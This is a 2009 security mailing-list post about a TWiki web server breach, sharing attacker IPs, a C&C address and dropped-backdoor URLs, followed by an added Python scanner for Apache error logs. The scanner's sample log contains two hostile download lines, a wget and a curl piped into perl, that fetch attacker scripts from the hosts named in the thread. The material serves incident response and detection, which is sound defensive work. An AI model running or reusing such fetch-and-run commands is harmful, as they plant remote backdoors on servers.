[nsp-sec] compromised unix systems

Gabriel Iovino giovino at ren-isac.net
Sat Aug 29 15:19:47 EDT 2009


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Rolf Gartmann wrote:
> based on an incident report from one of our customers,
> there is a C&C at 69.163.33.101 port 8080 (yes Team Cymru,
> feel free to add it ;) there are some additional systems to check for:
>
> teller-77954-apache!~x333052 at 192.33.115.12 PRIVMSG #prophecy[.exec.]
> 
> 225     | 192.33.115.12    | VIRGINIA-AS - University of Virginia
> 
> Timerange of information: 08/20 - 08/21
> 
> possible way of break-in seen so far:
> 
> - exploitation of vulnerable twiki
> - root escalation via wunderbar_emporium
>   (Linux 2.x kernel sock_sendpage() local root exploit)

I want to give everyone a follow up from this data set.

The institution I reached out to was indeed compromised and very
appreciative that this data was passed along. (thank you Rolf!!)

It appears this web server was breached two separate times.

It appears that they were able to exploit vulnerabilities on March 6th
and March 12th. The miscreants were seen on March 6th coming from the IP
<67.202.101.69>.

One of the vulnerabilities was identified as a known vulnerability in
TWiki's WebSearch function; the other vulnerability is unknown. It
could be another unpatched TWiki vulnerability.

The miscreants dropped a perl script <see attached> in TWiki's /bin/
area that gave them another back door to the machine.

I was told there was another back door in /tmp/ and they tried to get
root through a pulseaudio vulnerability.

I have also attached some data found in the apache error log referring to:

> hxxp://darkc0de.com/c0de/perl/conback.txt

Another URL that was seen in the logs was:

> hxxp://ezbake.org/tools/morg.txt

Please feel free to share this information with trusted people but
please leave out the institution that was breached.

If you have any information from an associated compromised twiki
installation, if you could share that with me I would appreciate it.

Part 2 coming in a second email, stay tuned!

Gabe

- --
Gabriel Iovino
Principal Security Engineer, REN-ISAC
http://www.ren-isac.net
24x7 Watch Desk +1(317)278-6630
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkqZf1MACgkQwqygxIz+pTuqbgCg2g9wPl0AmjuuVsnxvZSV/uEk
4AMAoIdBS8yBroi2RRTx1OK2/8dNpPiu
=CeKk
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: perl.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090829/d50fb554/attachment-0002.txt>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: apache_error.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090829/d50fb554/attachment-0003.txt>
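As an added example that is not part of Gabe's post, the attachments, or any REN-ISAC tooling: the indicators that surfaced here came out of the Apache error log (a command-injection payload that pulls a second-stage Perl script over HTTP and drops it in TWiki's bin directory). The scanner below walks error-log lines, extracts any URL, and flags lines that reference a watchlisted host, fetch a script-like file, or contain a download tool in the logged command. The sample log lines are constructed; the two host names are the ones quoted in the thread, and the list of fetch tools and payload extensions is an assumption to be tuned per site.

```python
import re
from dataclasses import dataclass, field

# Hosts quoted in the nsp-sec thread (written hxxp:// there); extend with
# whatever your own incident data turns up.
WATCHLIST_HOSTS = {"darkc0de.com", "ezbake.org"}

# Assumed list of fetchers that show up in an error log when an injected
# shell command pulls a second stage; not from the original post.
FETCH_TOOLS = ("wget", "curl", "lwp-download", "fetch ")

# Assumed set of "looks like a dropped script" extensions.
SCRIPT_EXT = (".txt", ".pl", ".sh", ".php", ".c")

# Matches http/https and the defanged hxxp/hxxps spelling used in reports.
URL_RE = re.compile(r"\b(?:h[xt]{2}ps?)://([A-Za-z0-9.-]+)(/[^\s\"'<>]*)?", re.I)


@dataclass
class Hit:
    line_no: int
    host: str
    path: str
    reasons: list = field(default_factory=list)


def scan_error_log(lines):
    """Return one Hit per suspicious URL found in the given error-log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in URL_RE.finditer(line):
            host = m.group(1).lower()
            path = m.group(2) or "/"
            reasons = []
            if host in WATCHLIST_HOSTS:
                reasons.append("watchlist host")
            if path.lower().endswith(SCRIPT_EXT):
                reasons.append("script-like payload")
            if any(tool in line for tool in FETCH_TOOLS):
                reasons.append("fetch tool in log line")
            if reasons:
                hits.append(Hit(n, host, path, reasons))
    return hits


# Constructed sample error-log lines; the two bad URLs are the ones from the
# thread, the client addresses are documentation ranges.
SAMPLE_LOG = [
    "[Fri Mar 06 02:14:51 2009] [error] [client 192.0.2.9] sh: wget "
    "http://darkc0de.com/c0de/perl/conback.txt -O /var/www/twiki/bin/.x",
    "[Fri Mar 06 02:15:02 2009] [error] [client 192.0.2.9] "
    "File does not exist: /var/www/html/favicon.ico",
    "[Thu Mar 12 23:41:10 2009] [error] [client 192.0.2.10] sh: curl "
    "http://ezbake.org/tools/morg.txt | perl",
    "[Thu Mar 12 23:42:00 2009] [error] [client 192.0.2.11] "
    "referer: http://www.example.edu/twiki/bin/view/Main/WebHome",
]


if __name__ == "__main__":
    for hit in scan_error_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.host}{hit.path} -> {', '.join(hit.reasons)}")
```

Only the two injected download lines are flagged; the legitimate TWiki referer URL matches the regex but trips none of the reasons, which is the point of scoring on host, payload shape and fetch tool rather than on the mere presence of a URL.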